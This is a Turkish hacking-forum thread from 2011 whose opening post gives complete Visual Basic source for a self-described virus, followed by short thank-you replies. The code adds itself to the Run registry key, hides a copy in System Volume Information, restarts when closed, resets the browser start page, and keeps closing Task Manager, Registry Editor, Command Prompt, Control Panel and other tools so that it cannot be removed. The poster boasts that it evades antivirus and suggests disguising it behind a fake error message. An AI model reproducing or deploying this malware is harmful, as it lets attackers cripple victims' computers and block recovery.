İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Basit Virüs Kodu .bat virüsü değil tırsmayın :)

03-10-2011 11:03
#1
PcChoLik - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2011
Nereden:
İstanbul
Yaş:
26
Mesajlar:
1.597
Teşekkür (Etti):
142
Teşekkür (Aldı):
752
Konular:
115
Ticaret:
(0) %
Basit ama etkili bir virüs.
Kullanıcının ayar yapabildiği Windows'un hayati pencere ve programlarının çalışmasını önleyen bir virüs...
Öncelerden bir virüs, sistemin hiçbir pencereyi açıp işlem yapmasına fırsat vermiyordu.Ben de bu virüsten esinlenerek, kendi çapımda buna benzer bir virüs yazdım.Ama yazmamdaki amaç başkalarına zarar vermak değil,sadece öğretim amaçlıdır.Neyse lafı fazla uzatmadan kodlara geçelim.
Öncelikle her pencere için ayrı timer kullandım.virüs 28 adet pencereyi ve/veya programı engellediği için forma 28 tane timer yerleştirin ve invertal değerlerini 1000 milisecond yapın.Formu ister gizli yapın, ister üzerine bir hata mesajının görüntüsünü yerleştirin Hata mesajı Verdirip Gizlemek daha KaRizMaTiK oluyor

Form Kodları:
*************
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Const WM_CLOSE = &H10

Private Sub Form_Load()
App.TaskVisible = False
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
Set Reg = CreateObject("Wscript.Shell")
Reg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"
End Sub
Private Sub Form_Initialize()
On Error Resume Next
Dim yol, ad, TamYol
yol = App.Path
ad = App.EXEName & ".exe"
TamYol = yol & "\" & ad
FileCopy TamYol, "C:\System Volume Information\runsys.exe"
End Sub
Private Sub Form_Terminate()
Dim ac, d1 As String
d1 = "C:\System Volume Information\runsys.exe"
ac = Shell(d1)
End Sub

Private Sub Timer1_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Bilgisayarım")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer10_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Winamp")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer11_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Denetim Masası")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer12_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Görüntü Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer13_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Görev Çubu?u ile Başlat Menüsü Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer14_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Program Ekle veya Kaldır")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer15_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Program ekle/kaldır")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer16_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Klasör Seçenekleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer17_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Aç")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer18_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Farklı Kaydet")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer19_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Ses Ayar Denetimi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer2_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Belgelerim")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer20_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Donanım Ekleme Sihirbazı")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer21_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Tarih ve Saat Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer22_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Ses Efekti ve Ses Aygıtları Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer23_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Internet Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer24_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Sistem Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer25_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Aygıt Yöneticisi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer26_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "********s and Settings")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer27_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Nero Express")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer28_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "about:blank - Microsoft Internet Explorer")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer3_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Program Files")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer4_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "WINDOWS")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer5_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Kayıt Defteri Düzenleyicisi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer6_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Sistem Yapılandırma Yardımcı Programı")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer7_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Komut İstemi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer8_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Windows Görev Yöneticisi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer9_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Windows Media Player")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub
*****************************


İşin güzelliği Virüs bir kopyasını System Volume Information klasörüne gizliyor.Biliyorsunuz bu klasör standart şartlarda görünmüyor.Ancak Nero Express vb. programlarla içeriği görebilirsiniz. Kendini başlata kaydediyor ve tıpkı bir trojan gibi kapatılmaya çalışıldığında tekrar çalışıyor.Registry sistem yapılandırma yardımcı programı ve görev yöneticisi gibi programların çalışmasını engellediğinden ayar yapmak ve temizlemek imkansız hale geliyor.Bu arada Yerli malı bu acemi virüsü anti virüsler de tanımıyor. Nasıl ama....
JersaW, snowcu76, uyuz adam Teşekkür etti.

03-10-2011 15:05
#2
JersaW - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
Şehir diyomus venüs yazdm pardon ustaa :D
Mesajlar:
782
Teşekkür (Etti):
27
Teşekkür (Aldı):
355
Konular:
39
Ticaret:
(0) %
Nasıl ama....
nasıl istersn
Kullanıcı İmzası
/
03-10-2011 16:58
#3
M'aSaL - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
09/2010
Nereden:
Konya
Mesajlar:
904
Teşekkür (Etti):
22
Teşekkür (Aldı):
53
Konular:
84
Ticaret:
(0) %
Teşekkürler Kardes
02-11-2011 20:16
#4
qReeYz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2009
Nereden:
YESIL KAFALILARIN GEZEGENINDEN
Yaş:
28
Mesajlar:
146
Teşekkür (Etti):
97
Teşekkür (Aldı):
12
Konular:
46
Ticaret:
(0) %
isime yarar ++
Kullanıcı İmzası
TurkHackTeaM


Herzaman Her Yerde
03-11-2011 07:49
#5
alperenbozkurt - ait Kullanıcı Resmi (Avatar)
Binbaşı
Üyelik tarihi:
08/2011
Nereden:
El Castillo Del Diablo
Yaş:
29
Mesajlar:
516
Teşekkür (Etti):
51
Teşekkür (Aldı):
89
Konular:
37
Ticaret:
(0) %
hacııııı bu timerler programlama dillerinde oluyo ama sen hangi programlama diliyle yapıldığını yazmamışsın bide o programlama dilinin linkini koysaydın herkezde yoktur
03-11-2011 11:33
#6
crayonx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2010
Nereden:
trakya
Mesajlar:
541
Teşekkür (Etti):
15
Teşekkür (Aldı):
27
Konular:
7
Ticaret:
(0) %
eyvalah..
Kullanıcı İmzası
Deha;imkansizi mumkun kilabilmektir...

Gemilerin karada da yuruyebilecegini sezmek,Mehmetlerden birini FATIH yapar...

Talihsizligimiz FATIHsizligimizdir...



Hangi yaşta olursak olalım kendi çevirdiğimiz çemberin arkasındaki koşan çocuklarız!!!
03-11-2011 21:22
#7
PcChoLik - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2011
Nereden:
İstanbul
Yaş:
26
Mesajlar:
1.597
Teşekkür (Etti):
142
Teşekkür (Aldı):
752
Konular:
115
Ticaret:
(0) %
Alıntı:
alperenbozkurt´isimli üyeden Alıntı Mesajı göster
hacııııı bu timerler programlama dillerinde oluyo ama sen hangi programlama diliyle yapıldığını yazmamışsın bide o programlama dilinin linkini koysaydın herkezde yoktur
Visual Basic..
uyuz adam Teşekkür etti.
05-11-2011 13:17
#8
Launch Jw - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Mesajlar:
115
Teşekkür (Etti):
25
Teşekkür (Aldı):
86
Konular:
37
Ticaret:
(0) %
Teşekkürler
14-11-2011 18:30
#9
uyuz adam - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2011
Mesajlar:
53
Teşekkür (Etti):
414
Teşekkür (Aldı):
2
Konular:
0
Ticaret:
(0) %
emeğe saygı usta eline sağlık!!!
15-11-2011 21:36
#10
narkozzzzz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Mesajlar:
53
Teşekkür (Etti):
4
Teşekkür (Aldı):
3
Konular:
2
Ticaret:
(0) %
Bilen Çok Ama Emege Saygı .

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı